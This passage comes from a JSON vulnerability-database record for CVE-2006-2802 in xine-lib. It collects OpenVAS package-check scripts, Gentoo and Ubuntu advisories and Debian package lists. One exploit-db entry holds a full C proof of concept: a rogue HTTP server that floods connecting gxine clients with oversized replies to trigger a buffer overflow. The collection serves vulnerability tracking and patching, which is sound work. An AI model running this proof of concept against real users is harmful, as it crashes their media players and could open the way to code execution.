tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"libxine\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.1.1_6\")<0) {\n txt += 'Package libxine version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:57", "references": [], "pluginID": "57886", "description": "The remote host is missing updates announced in\nadvisory GLSA 200609-08.", "edition": 2, "reporter": "Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-24T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Gentoo Security Advisory GLSA 200609-08 (xine-lib)", "type": "openvas", "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2802"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57886", "id": "OPENVAS:57886", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"xine-lib is vulnerable to multiple buffer overflows that could be exploited\nto execute arbitrary code.\";\ntag_solution = \"All xine-lib users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/xine-lib-1.1.2-r2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200609-08\nhttp://bugs.gentoo.org/show_bug.cgi?id=133520\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200609-08.\";\n\n \n\nif(description)\n{\n script_id(57886);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-2802\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200609-08 (xine-lib)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-libs/xine-lib\", unaffected: make_list(\"ge 1.1.2-r2\"), vulnerable: make_list(\"lt 1.1.2-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:12", "references": [], "pluginID": "57082", "description": "The remote host is missing an update to xine-lib\nannounced via advisory DSA 1105-1.\n\nFederico L. Bossi Bonin discovered a buffer overflow in the HTTP\nPlugin in xine-lib, the xine video/media player library, that could\nallow a remote attacker to cause a denial of service.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 0.9.8-2woody5.", "edition": 2, "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "title": "Debian Security Advisory DSA 1105-1 (xine-lib)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2802"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57082", "id": "OPENVAS:57082", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1105_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1105-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 1.0.1-1sarge3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 1.1.1-2.\n\nWe recommend that you upgrade your libxine packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201105-1\";\ntag_summary = \"The remote host is missing an update to xine-lib\nannounced via advisory DSA 1105-1.\n\nFederico L. Bossi Bonin discovered a buffer overflow in the HTTP\nPlugin in xine-lib, the xine video/media player library, that could\nallow a remote attacker to cause a denial of service.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 0.9.8-2woody5.\";\n\n\nif(description)\n{\n script_id(57082);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:13:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-2802\");\n script_bugtraq_id(18187);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 1105-1 (xine-lib)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"0.9.8-2woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine0\", ver:\"0.9.8-2woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine-dev\", ver:\"1.0.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libxine1\", ver:\"1.0.1-1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:02:27", "references": [], "pluginID": "136141256231057173", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-207-04.", "edition": 3, "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-09-11T00:00:00", "title": "Slackware Advisory SSA:2006-207-04 xine-lib", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2802", "CVE-2005-4048"], "modified": "2018-02-03T00:00:00", "id": "OPENVAS:136141256231057173", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231057173", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_207_04.nasl 8649 2018-02-03 12:16:43Z teissa $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New xine-lib packages are available for Slackware 10.2 and -current to\nfix security issues.\n\nEvidently there is also an issue involving AVI files which has not\nbeen issued a CVE entry.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-207-04.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-207-04\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.57173\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-03 13:16:43 +0100 (Sat, 03 Feb 2018) $\");\n script_cve_id(\"CVE-2005-4048\", \"CVE-2006-2802\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 8649 $\");\n name = \"Slackware Advisory SSA:2006-207-04 xine-lib \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"xine-lib\", ver:\"1.1.2-i686-1\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:42", "references": [], "pluginID": "57173", "description": "The remote host is missing an update as announced\nvia advisory SSA:2006-207-04.", "edition": 2, "reporter": "Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com", "published": "2012-09-11T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Slackware Advisory SSA:2006-207-04 xine-lib", "type": "openvas", "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2802", "CVE-2005-4048"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=57173", "id": "OPENVAS:57173", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2006_207_04.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New xine-lib packages are available for Slackware 10.2 and -current to\nfix security issues.\n\nEvidently there is also an issue involving AVI files which has not\nbeen issued a CVE entry.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2006-207-04.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2006-207-04\";\n \nif(description)\n{\n script_id(57173);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2005-4048\", \"CVE-2006-2802\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n name = \"Slackware Advisory SSA:2006-207-04 xine-lib \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"xine-lib\", ver:\"1.1.2-i686-1\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:04", "references": ["https://bugs.gentoo.org/show_bug.cgi?id=133520", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2802"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.1.2-r2", "packageName": "media-libs/xine-lib", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nxine is a high performance, portable and reusable multimedia playback engine. xine-lib is xine's core engine. \n\n### Description\n\nxine-lib contains buffer overflows in the processing of AVI. Additionally, xine-lib is vulnerable to a buffer overflow in the HTTP plugin (xineplug_inp_http.so) via a long reply from an HTTP server. \n\n### Impact\n\nAn attacker could trigger the buffer overflow vulnerabilities by enticing a user to load a specially crafted AVI file in xine. This might result in the execution of arbitrary code with the rights of the user running xine. Additionally, a remote HTTP server serving a xine client a specially crafted reply could crash xine and possibly execute arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll xine-lib users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/xine-lib-1.1.2-r2\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2006-09-13T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "gentoo", "title": "xine-lib: Buffer overflows", "bulletinFamily": "unix", "cvelist": ["CVE-2006-2802"], "modified": "2006-09-13T00:00:00", "id": "GLSA-200609-08", "href": "https://security.gentoo.org/glsa/200609-08", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T15:00:43", "osvdbidlist": ["25936"], "references": [], "description": "gxine 0.5.6 (HTTP Plugin) Remote Buffer Overflow PoC. CVE-2006-2802. Dos exploit for linux platform", "edition": 1, "reporter": "Federico L. Bossi Bonin", "published": "2006-05-30T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "gxine 0.5.6 HTTP Plugin Remote Buffer Overflow PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-2802"], "modified": "2006-05-30T00:00:00", "id": "EDB-ID:1852", "href": "https://www.exploit-db.com/exploits/1852/", "sourceData": "//////////////////////////////////////////////////////\n// gxine - HTTP Plugin Remote Buffer Overflow PoC\n/////////////////////////////////////////////////////\n//\n// Federico L. Bossi Bonin\n// fbossi[at]netcomm[dot]com[dot]ar\n/////////////////////////////////////////////////////\n\n// TESTED on gxine 0.5.6\n////////////////////////\n\n// 0xb78eccc7 in free () from /lib/tls/libc.so.6\n// (gdb) backtrace\n// #0 0xb78eccc7 in free () from /lib/tls/libc.so.6\n// #1 0xb7438fc8 in ?? () from /usr/lib/xine/plugins/1.1.1/xineplug_inp_http.so\n// #2 0x41414141 in ?? ()\n// #3 0xb7f42164 in ?? () from /usr/lib/libxine.so.1\n// #4 0x080b1810 in ?? ()\n// #5 0xb7f0e635 in xine_open () from /usr/lib/libxine.so.1\n// #6 0xb7f3967f in ?? () from /usr/lib/libxine.so.1\n// #7 0x0877c084 in ?? ()\n// #8 0x0930a931 in ?? ()\n// #9 0x080880a2 in defs.3 ()\n// #10 0xb0088478 in ?? ()\n// #11 0x00000000 in ?? ()\n\n#include <stdio.h>\n#include <sys/types.h> \n#include <sys/socket.h>\n#include <netinet/in.h>\n#define PORT 81\n#define LEN 9500\n\nvoid shoot(int);\n\nint main() {\nstruct sockaddr_in srv_addr, client;\nint len,pid,sockfd,sock;\n\nsockfd = socket(AF_INET, SOCK_STREAM, 0);\n\nif (sockfd < 0) { \nperror(\"error socket()\"); \nexit(1);\n}\n \nbzero((char *) &srv_addr, sizeof(srv_addr));\nsrv_addr.sin_family = AF_INET;\nsrv_addr.sin_addr.s_addr = INADDR_ANY;\nsrv_addr.sin_port = htons(PORT);\n\nif (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) {\nperror(\"error bind()\");\nexit(1);\n}\n\n\n\nprintf(\"Listening on port %i\\n\",PORT);\n\nlisten(sockfd,5);\nlen = sizeof(client);\n\nwhile (1) {\nsock = accept(sockfd, (struct sockaddr *) &client, &len);\nif (sock < 0) {\nperror(\"error accept()\");\nexit(1);\n}\n\npid = fork();\nif (pid < 0) {\nperror(\"fork()\");\nexit(1);\n}\nif (pid == 0) {\nclose(sockfd);\nprintf(\"Conection from %s\\n\",inet_ntoa(client.sin_addr));\nshoot(sock);\nexit(0);\n}\nelse close(sock);\n} \nreturn 0;\n}\n\nvoid shoot (int sock) {\nint i;\nfor (i=0 ; i < LEN ; i++) {\nwrite(sock,\"\\x41\",1);\n}\n\n}\n\n// milw0rm.com [2006-05-30]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1852/"}], "ubuntu": [{"lastseen": "2018-08-31T00:09:12", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2006-2802"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libxine-main1 - 1.1.1+ubuntu2-7.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.04", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libxine1 - 1.0-1ubuntu3.7", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "5.10", "packageVersion": "any", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "libxine1c2 - 1.0.1-1ubuntu10.3", "operator": "lt"}], "description": "Federico L. Bossi Bonin discovered a buffer overflow in the HTTP input module. By tricking an user into opening a malicious remote media location, a remote attacker could exploit this to crash Xine library frontends (like totem-xine, gxine, or xine-ui) and possibly even execute arbitrary code with the user\u2019s privileges.", "edition": 3, "reporter": "Ubuntu", "published": "2006-06-09T00:00:00", "title": "xine-lib vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-2802"], "modified": "2006-06-09T00:00:00", "id": "USN-295-1", "href": "https://usn.ubuntu.com/295-1/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2016-09-02T18:33:13", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "mips", "packageFilename": "libxine1_1.0.1-1sarge3_mips.deb", "packageName": "libxine1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "ppc", "packageFilename": "libxine-dev_1.0.1-1sarge3_powerpc.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8.orig", "arch": "src", "packageFilename": "xine-lib_0.9.8.orig.tar.gz", "packageName": "xine-lib", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "ia64", "packageFilename": "libxine1_1.0.1-1sarge3_ia64.deb", "packageName": "libxine1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "hppa", "packageFilename": "libxine1_1.0.1-1sarge3_hppa.deb", "packageName": "libxine1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "s390x", "packageFilename": "libxine-dev_0.9.8-2woody5_s390.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "alpha", "packageFilename": "libxine1_1.0.1-1sarge3_alpha.deb", "packageName": "libxine1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "alpha", "packageFilename": "libxine-dev_0.9.8-2woody5_alpha.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "s390x", "packageFilename": "libxine1_1.0.1-1sarge3_s390.deb", "packageName": "libxine1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "m68k", "packageFilename": "libxine-dev_1.0.1-1sarge3_m68k.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "arm", "packageFilename": "libxine0_0.9.8-2woody5_arm.deb", "packageName": "libxine0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5.diff", "arch": "src", "packageFilename": "xine-lib_0.9.8-2woody5.diff.gz", "packageName": "xine-lib", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "hppa", "packageFilename": "libxine-dev_0.9.8-2woody5_hppa.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "ia64", "packageFilename": "libxine-dev_0.9.8-2woody5_ia64.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "mips", "packageFilename": "libxine-dev_0.9.8-2woody5_mips.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1.orig", "arch": "src", "packageFilename": "xine-lib_1.0.1.orig.tar.gz", "packageName": "xine-lib", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "hppa", "packageFilename": "libxine-dev_1.0.1-1sarge3_hppa.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "i686", "packageFilename": "libxine-dev_0.9.8-2woody5_i386.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "src", "packageFilename": "xine-lib_1.0.1-1sarge3.dsc", "packageName": "xine-lib", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "mips", "packageFilename": "libxine-dev_1.0.1-1sarge3_mips.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "arm", "packageFilename": "libxine-dev_1.0.1-1sarge3_arm.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "ppc", "packageFilename": "libxine1_1.0.1-1sarge3_powerpc.deb", "packageName": "libxine1", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "s390x", "packageFilename": "libxine0_0.9.8-2woody5_s390.deb", "packageName": "libxine0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "hppa", "packageFilename": "libxine0_0.9.8-2woody5_hppa.deb", "packageName": "libxine0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "sparc", "packageFilename": "libxine-dev_0.9.8-2woody5_sparc.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "mipsel", "packageFilename": "libxine-dev_0.9.8-2woody5_mipsel.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "alpha", "packageFilename": "libxine0_0.9.8-2woody5_alpha.deb", "packageName": "libxine0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.0.1-1sarge3", "arch": "mipsel", "packageFilename": "libxine-dev_1.0.1-1sarge3_mipsel.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "i686", "packageFilename": "libxine0_0.9.8-2woody5_i386.deb", "packageName": "libxine0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "m68k", "packageFilename": "libxine-dev_0.9.8-2woody5_m68k.deb", "packageName": "libxine-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.0", "packageVersion": "0.9.8-2woody5", "arch": "ppc", "packageFilename": "libxine0_0.9.8-2woody5_powerpc.deb", "packageName": "libxine0", "operator": "lt"}, {"OS": "Debian 